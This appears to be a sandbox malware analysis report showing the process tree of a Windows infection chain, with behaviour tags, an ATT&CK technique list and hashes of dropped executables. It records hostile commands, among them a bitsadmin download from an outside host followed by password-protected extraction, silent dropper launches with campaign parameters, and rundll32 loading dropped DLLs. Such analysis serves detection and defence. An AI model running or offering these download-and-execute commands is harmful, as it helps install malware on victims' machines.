C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=39⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x7c,0x10c,0x7ff860e046f8,0x7ff860e04708,0x7ff860e0471810⤵
-
C:\Users\Admin\AppData\Local\Temp\dd-152dd-36c-6c3a7-1e99197045e5e\Tobabawehy.exe"C:\Users\Admin\AppData\Local\Temp\dd-152dd-36c-6c3a7-1e99197045e5e\Tobabawehy.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2aoqjycs.bvi\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\2aoqjycs.bvi\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\2aoqjycs.bvi\GcleanerEU.exe /eufive10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 25611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s14xg3tn.rhu\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\s14xg3tn.rhu\installer.exeC:\Users\Admin\AppData\Local\Temp\s14xg3tn.rhu\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\s14xg3tn.rhu\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\s14xg3tn.rhu\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632307234 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jru1gdjp.4um\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\jru1gdjp.4um\anyname.exeC:\Users\Admin\AppData\Local\Temp\jru1gdjp.4um\anyname.exe10⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3xdac5wz.vio\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\3xdac5wz.vio\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\3xdac5wz.vio\gcleaner.exe /mixfive10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 25611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\350yy2dq.de1\autosubplayer.exe /S & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\350yy2dq.de1\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\350yy2dq.de1\autosubplayer.exe /S10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
- Checks for any installed AV software in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z11⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pF1Cp7aJwiPoTuRt -y x C:\zip.7z -o"C:\Program Files\temp_files\"11⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNSkZ1CRlSRuMwfs -y x C:\zip.7z -o"C:\Program Files\temp_files\"11⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JFLQwz\JFLQwz.dll" JFLQwz11⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\JFLQwz\JFLQwz.dll" JFLQwz12⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf5699.tmp\tempfile.ps1"11⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT11⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv hT4RkUrQU0KJr6hWfqbv1w.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 2642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3572 -ip 35721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4628 -ip 46281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4660 -ip 46601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 480 -p 6084 -ip 60841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1168 -ip 11681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6108 -ip 61081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 5316 -ip 53161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4688 -ip 46881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5212 -ip 52121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5252 -ip 52521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1432 -ip 14321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DFDA0CD8D8756A85E44943F3150EE501 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EA8C32CC92ECE1CC67ED3EF56A9BA6B72⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 030E0FCE840B38D320E014F5C1C52C81 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2032 -ip 20321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 4603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5632 -ip 56321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1368 -ip 13681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6336 -ip 63361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2948 -ip 29481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1956 -ip 19561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5288 -ip 52881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 6228 -ip 62281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6096 -ip 60961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\A85B.exeC:\Users\Admin\AppData\Local\Temp\A85B.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\C2AB.exeC:\Users\Admin\AppData\Local\Temp\C2AB.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3388 -s 8762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3388 -ip 33881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6324 -ip 63241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 6208 -ip 62081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6344 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6344 -s 4483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 6344 -ip 63441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1BITS Jobs
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1BITS Jobs
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
568e59b049157be578b13da25b110351
SHA17f134a0efd5cda9c2898de51504ba159819ede59
SHA25698ff038dffbc25ded38d5041a157dc3e8a14b92394358446db4dc3e6d5593ee6
SHA512c020b4d1bef1bf2be6820dc904b61b314f24dc1809a7e97ab1e3d6ba217ee7b282f70def44879effec54425f000403175725f219eb4d165be422ab104902dc90
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
568e59b049157be578b13da25b110351
SHA17f134a0efd5cda9c2898de51504ba159819ede59
SHA25698ff038dffbc25ded38d5041a157dc3e8a14b92394358446db4dc3e6d5593ee6
SHA512c020b4d1bef1bf2be6820dc904b61b314f24dc1809a7e97ab1e3d6ba217ee7b282f70def44879effec54425f000403175725f219eb4d165be422ab104902dc90
-
C:\Users\Admin\AppData\Local\Temp\3002.exeMD5
e511bb4cf31a2307b6f3445a869bcf31
SHA176f5c6e8df733ac13d205d426831ed7672a05349
SHA25656002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137
SHA5129c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c
-
C:\Users\Admin\AppData\Local\Temp\5.exeMD5
ce31e837ebcd0856a520a76343ec3ec5
SHA1ca3931f935f8b87c2766ed4e2f440694dc63bfbf
SHA2569a64261e29e62cf06652863b49f86b85183ea14302eede53eb075245c70b012b
SHA512fc778da36ad7c17b6bd53f884441f992c6eb56e8502f511c92c533dcc7330bf4a6e6df9d051fa5ed7f913d8dd23a9ee5181ee71843a73c8dcb0a3df4bcf1cc14
-
C:\Users\Admin\AppData\Local\Temp\5.exeMD5
ce31e837ebcd0856a520a76343ec3ec5
SHA1ca3931f935f8b87c2766ed4e2f440694dc63bfbf
SHA2569a64261e29e62cf06652863b49f86b85183ea14302eede53eb075245c70b012b
SHA512fc778da36ad7c17b6bd53f884441f992c6eb56e8502f511c92c533dcc7330bf4a6e6df9d051fa5ed7f913d8dd23a9ee5181ee71843a73c8dcb0a3df4bcf1cc14
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1905815e51282417.exeMD5
1aecd083bbec326d90698a79f73749d7
SHA11ea884d725caec27aac2b3c0baccfd0c380a414e
SHA256d5ccebea40a76ec2c82cac45cc208a778269e743f1a825ef881533b85d6c1d31
SHA512c1044945b17c8f2063a9b95367db93ad6d0f6e316ad9c3b32d2a2259459098b72f85f5569b5a33f7dae68194697c448617e37b6f24558a7ad9cb53b0f382b064
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1905815e51282417.exeMD5
1aecd083bbec326d90698a79f73749d7
SHA11ea884d725caec27aac2b3c0baccfd0c380a414e
SHA256d5ccebea40a76ec2c82cac45cc208a778269e743f1a825ef881533b85d6c1d31
SHA512c1044945b17c8f2063a9b95367db93ad6d0f6e316ad9c3b32d2a2259459098b72f85f5569b5a33f7dae68194697c448617e37b6f24558a7ad9cb53b0f382b064
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1908b94df837b3158.exeMD5
26c211413dfd432a9ce28c19a67910a1
SHA1dbf2173faa9e35bb9c710e289a247786248fe9e8
SHA256e2a9ab13cd3031c7f5c84180de1f62d5905f87094efd8ab654b5fb7d88860e1b
SHA5124c096e8ed12ebd5ef12b53fb9179fd0c8262837668994a2f2466c61436de95411f05f3af341ac9370448b6e910775b6a3c3a6ddb25850a2b4977c0bc3a3468cd
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1908b94df837b3158.exeMD5
26c211413dfd432a9ce28c19a67910a1
SHA1dbf2173faa9e35bb9c710e289a247786248fe9e8
SHA256e2a9ab13cd3031c7f5c84180de1f62d5905f87094efd8ab654b5fb7d88860e1b
SHA5124c096e8ed12ebd5ef12b53fb9179fd0c8262837668994a2f2466c61436de95411f05f3af341ac9370448b6e910775b6a3c3a6ddb25850a2b4977c0bc3a3468cd
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun191101c1aaa.exeMD5
ae0bb0ef615f4606fbe1f050b6f08ca3
SHA1f69b6d6496d8941ef53bca7c3578ad616cf5a4b1
SHA25603d079303a3164960677e57a587e86c3a5e7736fbde0ab7b9e60c4b8b2e50745
SHA512ec9ac14ac2ef705867c6c1611671c8185f3d3fe671a787840132a337d4bdf1ad3b808aa3ca24eee58bda78bef19e7a2a9ea5299b224bb370622e5072aa790afd
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun191101c1aaa.exeMD5
ae0bb0ef615f4606fbe1f050b6f08ca3
SHA1f69b6d6496d8941ef53bca7c3578ad616cf5a4b1
SHA25603d079303a3164960677e57a587e86c3a5e7736fbde0ab7b9e60c4b8b2e50745
SHA512ec9ac14ac2ef705867c6c1611671c8185f3d3fe671a787840132a337d4bdf1ad3b808aa3ca24eee58bda78bef19e7a2a9ea5299b224bb370622e5072aa790afd
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1917b8fb5f09db8.exeMD5
8a40bac445ecb19f7cb8995b5ae9390b
SHA12a8a36c14a0206acf54150331cc178af1af06d9c
SHA2565da618d0d54f9251a1735057b27f9a5188e2ddd44f53ce35ce69caaf678f26a8
SHA51260678907bd654ff44036abcb4491056a1a2279b21e6ac933d2423362dc59ab1232c67cd93ddb80bfe80decc288eb874e333a8b630bf96a0e723bc654c4e35de6
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1917b8fb5f09db8.exeMD5
8a40bac445ecb19f7cb8995b5ae9390b
SHA12a8a36c14a0206acf54150331cc178af1af06d9c
SHA2565da618d0d54f9251a1735057b27f9a5188e2ddd44f53ce35ce69caaf678f26a8
SHA51260678907bd654ff44036abcb4491056a1a2279b21e6ac933d2423362dc59ab1232c67cd93ddb80bfe80decc288eb874e333a8b630bf96a0e723bc654c4e35de6
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun19262b9e49ad.exeMD5
1ba385ddf10fcc6526f9a443cb27d956
SHA1a8aa18cda5c9cebb1468abd95860ac69102d1295
SHA256ea8cce26f5348e13395c7b4a713b28a7801cfc1a27b67bb860b82063c4276a1d
SHA5121b4f96a9b0e5e203a5a5af88f6f9f71767798bc1ffbfa8d450f93a1cd847045da377730d7208683c0dc1dc5121b46178372d044227af287aca892fc4c82aedc8
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun19262b9e49ad.exeMD5
1ba385ddf10fcc6526f9a443cb27d956
SHA1a8aa18cda5c9cebb1468abd95860ac69102d1295
SHA256ea8cce26f5348e13395c7b4a713b28a7801cfc1a27b67bb860b82063c4276a1d
SHA5121b4f96a9b0e5e203a5a5af88f6f9f71767798bc1ffbfa8d450f93a1cd847045da377730d7208683c0dc1dc5121b46178372d044227af287aca892fc4c82aedc8
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun193fda712d9f1.exeMD5
535ae8dbaa2ab3a37b9aa8b59282a5c0
SHA1cb375c45e0f725a8ee85f8cb37826b93d0a3ef94
SHA256d838cfaf7b197d6c3379e2c5daf269cc422a09df556de6ca08fe174b4906b3b6
SHA5126be6a3d8fa5d1fb17f85bdacf873280a3a074739fb68037de1a50c63d2d24e5b6b3ffabb838c3097ff9840ed27391a3fb812c802010ca3db860414c34123867c
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun193fda712d9f1.exeMD5
535ae8dbaa2ab3a37b9aa8b59282a5c0
SHA1cb375c45e0f725a8ee85f8cb37826b93d0a3ef94
SHA256d838cfaf7b197d6c3379e2c5daf269cc422a09df556de6ca08fe174b4906b3b6
SHA5126be6a3d8fa5d1fb17f85bdacf873280a3a074739fb68037de1a50c63d2d24e5b6b3ffabb838c3097ff9840ed27391a3fb812c802010ca3db860414c34123867c
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun195a1614ec24e6a.exeMD5
9b7319450f0633337955342ae97fa060
SHA14cc5b5dfc5a4cf357158aedcab93ce4cc5bff350
SHA256c3926ccef4c9bce26bd1217ea25e108d92707847e04ddb4e1eadfff1a913d085
SHA512e75d5e032374ead6836e37ad8a4e2d59da7e641aea178551ee187980455067d90c076ac8e49330b55e1f13591a14305401f3e59520b63ed628a83213220b7ffb
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun195a1614ec24e6a.exeMD5
9b7319450f0633337955342ae97fa060
SHA14cc5b5dfc5a4cf357158aedcab93ce4cc5bff350
SHA256c3926ccef4c9bce26bd1217ea25e108d92707847e04ddb4e1eadfff1a913d085
